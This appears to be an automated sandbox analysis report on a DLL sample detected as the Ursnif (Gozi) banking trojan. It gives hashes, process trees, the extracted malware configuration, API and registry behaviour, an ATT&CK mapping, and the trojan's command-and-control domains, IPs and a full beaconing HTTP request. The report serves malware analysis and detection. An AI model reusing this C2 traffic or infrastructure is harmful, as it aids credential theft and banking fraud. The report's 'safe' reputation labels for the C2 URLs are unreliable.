Analysis Report zQ32b1FVcL.dll

Overview

General Information

Sample Name: zQ32b1FVcL.dll
Analysis ID: 338663
MD5: eed4174c8a96dd7b611d9f109c71e20f
SHA1: c471724d86fd269a19932280361ca52e1e294f19
SHA256: e5dc940537146c1c56b8a8f91234484c83223943c13d2fbf354f0cfdec13c258
Tags: dll, Gozi

Detection

Ursnif
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6132 cmdline: loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
  • iexplore.exe (PID: 6388 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6496 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1140 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3288 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6620 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3984 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6772 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            AV Detection:

            Found malware configuration
            Source: loaddll32.exe.6132.1.memstr; Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}
            Source: 1.2.loaddll32.exe.cc0000.2.unpack; Avira: Label: TR/Crypt.XPACK.Gen8
            Source: 1.2.loaddll32.exe.10000000.4.unpack; Avira: Label: TR/Crypt.XPACK.Gen8
            Source: zQ32b1FVcL.dll; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: global traffic; HTTP traffic detected:
                GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1
                Accept: text/html, application/xhtml+xml, image/jxr, */*
                Accept-Language: en-US
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Accept-Encoding: gzip, deflate
                Host: begoventa.top
                Connection: Keep-Alive
            Source: global traffic; HTTP traffic detected:
                GET /favicon.ico HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: begoventa.top
                Connection: Keep-Alive
            Source: msapplication.xml0.16.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.16.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.16.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.16.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.16.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.16.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknown; DNS traffic detected: queries for: babidone.top
            Source: {8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr; String found in binary or memory: http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R
            Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp; String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd
            Source: {B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr; String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9
            Source: zQ32b1FVcL.dll; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: zQ32b1FVcL.dll; String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: zQ32b1FVcL.dll; String found in binary or memory: http://ocsp.sectigo.com0
            Source: msapplication.xml.16.dr; String found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.16.dr; String found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.16.dr; String found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.16.dr; String found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.16.dr; String found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.16.dr; String found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.16.dr; String found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.16.dr; String found in binary or memory: http://www.youtube.com/
            Source: loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp; String found in binary or memory: https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p
            Source: zQ32b1FVcL.dll; String found in binary or memory: https://sectigo.com/CPS0D
            Source: unknown; Network traffic detected: HTTP traffic on port 49754 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match; File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe; WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_10001812 NtMapViewOfSection
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_10001DD0 GetProcAddress,NtCreateSection,memset
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_100022E5 NtQueryVirtualMemory
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CF9932 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CFB2C1 NtQueryVirtualMemory
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_100020C4
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CFB09C
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CFEC48
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CFEC41
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CF99FC
            Source: zQ32b1FVcL.dll; Static PE information: invalid certificate
            Source: zQ32b1FVcL.dll; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: zQ32b1FVcL.dll; Binary or memory string: OriginalFilename360SkinView.exeF vs zQ32b1FVcL.dll
            Source: zQ32b1FVcL.dll; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
            Source: classification engine; Classification label: mal64.troj.winDLL@13/44@4/3
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CF244A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
            Source: C:\Program Files\internet explorer\iexplore.exe; File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
            Source: C:\Program Files\internet explorer\iexplore.exe; File created: C:\Users\user\AppData\Local\Temp\~DFD53763C3DA639732.TMP
            Source: zQ32b1FVcL.dll; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exe; File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\loaddll32.exe; File read: C:\Windows\System32\drivers\etc\hosts
            Source: unknown; Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
            Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
            Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
            Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
            Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: Window Recorder; Window detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: zQ32b1FVcL.dll; Static PE information: section name: .data2
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_100020B3 push ecx; ret 1_2_100020C3
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_10002060 push ecx; ret 1_2_10002069
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CFACD0 push ecx; ret 1_2_00CFACD9
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CFB08B push ecx; ret 1_2_00CFB09B
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C81830 push edx; ret 1_2_00C81934
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C644CE push edx; ret 1_2_00C644CF
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C611C0 push eax; iretd 1_2_00C611D6
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C615D6 push ecx; ret 1_2_00C615D7
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C63DFA push ecx; retf 1_2_00C63E01
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C65116 pushad ; ret 1_2_00C65129
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C63E99 push FFFFFFCFh; retf 1_2_00C63EC7
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C63A4D push 92BB463Fh; iretd 1_2_00C63A52
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C643F7 push ss; ret 1_2_00C643F8
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00C63F02 push dword ptr [edi+64h]; iretd 1_2_00C63F0C

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: C:\Windows\System32\loaddll32.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: loaddll32.exe, 00000001.00000002.589296510.00000000004F9000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAWH
            Source: C:\Windows\System32\loaddll32.exe; Memory protected: page execute read | page guard
            Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp; Binary or memory string: Program Manager
            Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp; Binary or memory string: Progman
            Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CF5DC6 cpuid
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_100019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_00CF5DC6 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree
            Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_10001799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError

            Stealing of Sensitive Information:

            Yara detected Ursnif

            Remote Access Functionality:

            Yara detected Ursnif

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 2 | Security Account Manager | Security Software Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 13 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            [Behavior graph image. Behavior Graph ID: 338663, Sample: zQ32b1FVcL.dll, Startdate: 12/01/2021, Architecture: WINDOWS, Score: 64]
            • Signatures: Found malware configuration; Yara detected Ursnif
            • loaddll32.exe: Writes or reads registry keys via WMI; Writes registry values via WMI; DNS/IP: babidone.top
            • iexplore.exe: DNS/IP: 192.168.2.1 (unknown)
            • iexplore.exe (child process): DNS/IP: begoventa.top 47.91.89.242, 49746, 49747, 80 (CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, United States)
            • iexplore.exe (child process): DNS/IP: babidone.top 193.56.255.166, 443, 80 (INFOCLOUD-SRLMD, Romania)


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            1.2.loaddll32.exe.cf0000.3.unpack | 100% | Avira | HEUR/AGEN.1108168
            1.2.loaddll32.exe.cc0000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
            1.2.loaddll32.exe.10000000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8

            Domains

            Source | Detection | Scanner
            begoventa.top | 2% | Virustotal
            babidone.top | 2% | Virustotal

            URLs

            Source | Detection | Scanner | Label
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
            http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9 | 0% | Avira URL Cloud | safe
            http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
            http://begoventa.top/favicon.ico | 0% | Avira URL Cloud | safe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
            https://sectigo.com/CPS0D | 0% | URL Reputation | safe
            http://www.wikipedia.com/ | 0% | URL Reputation | safe
            http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd | 0% | Avira URL Cloud | safe
            http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi | 0% | Avira URL Cloud | safe
            http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R | 0% | Avira URL Cloud | safe
            https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Reputation
            begoventa.top | 47.91.89.242 | true | false | unknown
            babidone.top | 193.56.255.166 | true | false | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://begoventa.top/favicon.ico | false | Avira URL Cloud: safe | unknown
            http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi | false | Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | zQ32b1FVcL.dll | false | URL Reputation: safe | unknown
            http://www.nytimes.com/ | msapplication.xml3.16.dr | false | | high
            http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9 | {B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr | false | Avira URL Cloud: safe | unknown
            http://ocsp.sectigo.com0 | zQ32b1FVcL.dll | false | URL Reputation: safe | unknown
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | zQ32b1FVcL.dll | false | URL Reputation: safe | unknown
            http://www.youtube.com/ | msapplication.xml7.16.dr | false | | high
            https://sectigo.com/CPS0D | zQ32b1FVcL.dll | false | URL Reputation: safe | unknown
            http://www.wikipedia.com/ | msapplication.xml6.16.dr | false | URL Reputation: safe | unknown
            http://www.amazon.com/ | msapplication.xml.16.dr | false | | high
            http://www.live.com/ | msapplication.xml2.16.dr | false | | high
            http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd | loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | unknown
